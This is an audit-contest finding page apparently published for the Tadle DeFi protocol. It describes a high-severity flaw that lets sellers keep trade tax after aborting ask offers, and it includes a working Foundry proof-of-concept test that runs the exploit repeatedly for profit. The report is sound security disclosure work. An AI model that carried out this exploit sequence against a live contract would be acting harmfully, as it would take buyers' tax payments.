Tadle

DeFi

30,000 USDC

View results

Previous Next

Submission Details

Severity: high

Valid

Users can Profit from Tax Fees Without Settlement Obligations

oxelmiguel

Summary

After creating an ask offer, users can call the abortAskOffer function to withdraw their entire collateral, causing buyers to receive their funds back. However, users can also withdraw the tax fees they have collected. This allows them to create offers, collect tax fees from buyers, and then abort the offer to reclaim their collateral. As a result, they profit solely from the tax fees without any intention of fulfilling their settlement obligations.

Vulnerabilities details

In its current implementation, the protocol permits sellers to withdraw their full collateral and retain the tax fees when they abort an offer. While buyers are refunded their collateral, the seller profits from the tax fees, which were collected under the assumption that the seller would fulfill their settlement obligations.

Proof of concept

Alice creates an Ask Offer :

collateral : 10 000 usdc
Points Listed : 1 000
each Trade Tax : 3%

Alice sells all her points :

Tax collected : 300 usdc

Alice aborts the offer :

Reclaims 10,000 USDC in collateral.
Retains the 300 USDC in collected tax fees.

Alice Repeats the Process:

By repeating this process 10 times, Alice can accumulate 3,000 USDC in tax fees without any risk or obligation to settle.

In this scenario, Alice generates risk-free profits solely from the tax fees, without ever delivering the tokens to buyers. This allows for potential abuse of the platform, where users can exploit the system for financial gain without fulfilling their contractual obligations.

Working Test Case

function test_tax_fee() public {

// create two user

address alice = vm.addr(10); //the atacker

address bob = vm.addr(11);

// alice start with 10 000 usdc

deal(address(mockUSDCToken), alice, 12000 );

// we use one buyer

deal(address(mockUSDCToken), bob, 14000 );

uint8 i = 0;

uint8 j = 0;

// alice create and abort 11 times

while (i<11) {

// create an offer with 3% tax Fee

vm.startPrank(alice);

mockUSDCToken.approve(address(tokenManager), type(uint256).max);

preMarktes.createOffer(

CreateOfferParams(

marketPlace,

address(mockUSDCToken),

1000,

10000,

12000,

300,

OfferType.Ask,

OfferSettleType.Turbo

)

);

address aliceOffr = GenerateAddress.generateOfferAddress(j);

address aliceStock = GenerateAddress.generateStockAddress(j);

j+=1;

vm.stopPrank();

// buyer buy from alice

vm.startPrank(bob);

mockUSDCToken.approve(address(tokenManager), type(uint256).max);

preMarktes.createTaker(aliceOffr, 1000);

address stock1Addr = GenerateAddress.generateStockAddress(j);

j +=1;

vm.stopPrank();

// now alice abort offer and withdraw her funds + tax fee

vm.startPrank(alice);

preMarktes.abortAskOffer(aliceStock, aliceOffr);

tokenManager.withdraw(address(mockUSDCToken), TokenBalanceType.SalesRevenue);

tokenManager.withdraw(address(mockUSDCToken), TokenBalanceType.MakerRefund);

tokenManager.withdraw(address(mockUSDCToken), TokenBalanceType.TaxIncome);

vm.stopPrank();

// buyer also withdraw their funds

vm.startPrank(bob);

preMarktes.abortBidTaker(stock1Addr, aliceOffr);

tokenManager.withdraw(address(mockUSDCToken), TokenBalanceType.MakerRefund);

vm.stopPrank();

i++;

}

// Alice deposits 12,000 USDC as collateral and ultimately

// ends up with 15,300 USDC, making a profit of 3,300 USDC from collected tax fees.

assertEq( mockUSDCToken.balanceOf(alice), 12000 + 3300);

}

Impact

This issue allows malicious users to exploit the protocol by creating offers and collecting tax fees with no intention of completing the settlement. By aborting their offers after collecting the fees, they can withdraw their entire collateral, leading to a scenario where buyers lose their tax fees and receive nothing in return. This behavior could significantly harm the trust and reliability of the platform, as it creates a situation where buyers are unprotected and the market's fairness is compromised.

Tools Used

manual review, foundry

Recommendations

Implement a mechanism that automatically returns collected tax fees to buyers if the seller aborts their offer. This will prevent sellers from profiting from tax fees without fulfilling their obligations.
Adjust the withdrawal process so that sellers can only withdraw their collateral minus the tax collected. This ensures that sellers cannot exploit the system by repeatedly creating and aborting offers to gain tax fees without any risk.

Updates

Lead Judging Commences

0xnevi Lead Judge 10 months ago

Submission Judgement Published

Validated

Assigned finding tags:

finding-PreMarkets-immediate-withdrawal-allow-maker-steal-funds

Valid high severity, given orginal offer makers are not a trusted entity to enforce a settlement. The trade tax set by the maker should be returned back to the takers to avoid abuse of abortion of ask offers to steal trade tax from takers. Note for appeals period: See issue #528 for additional details

Prize pool breakdown

Total prize

30,000 USDC

nSLOC

1,229

24 USDC / LOC

High Medium

25,000 USDC

Low

2,750 USDC

Judges

2,250 USDC

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.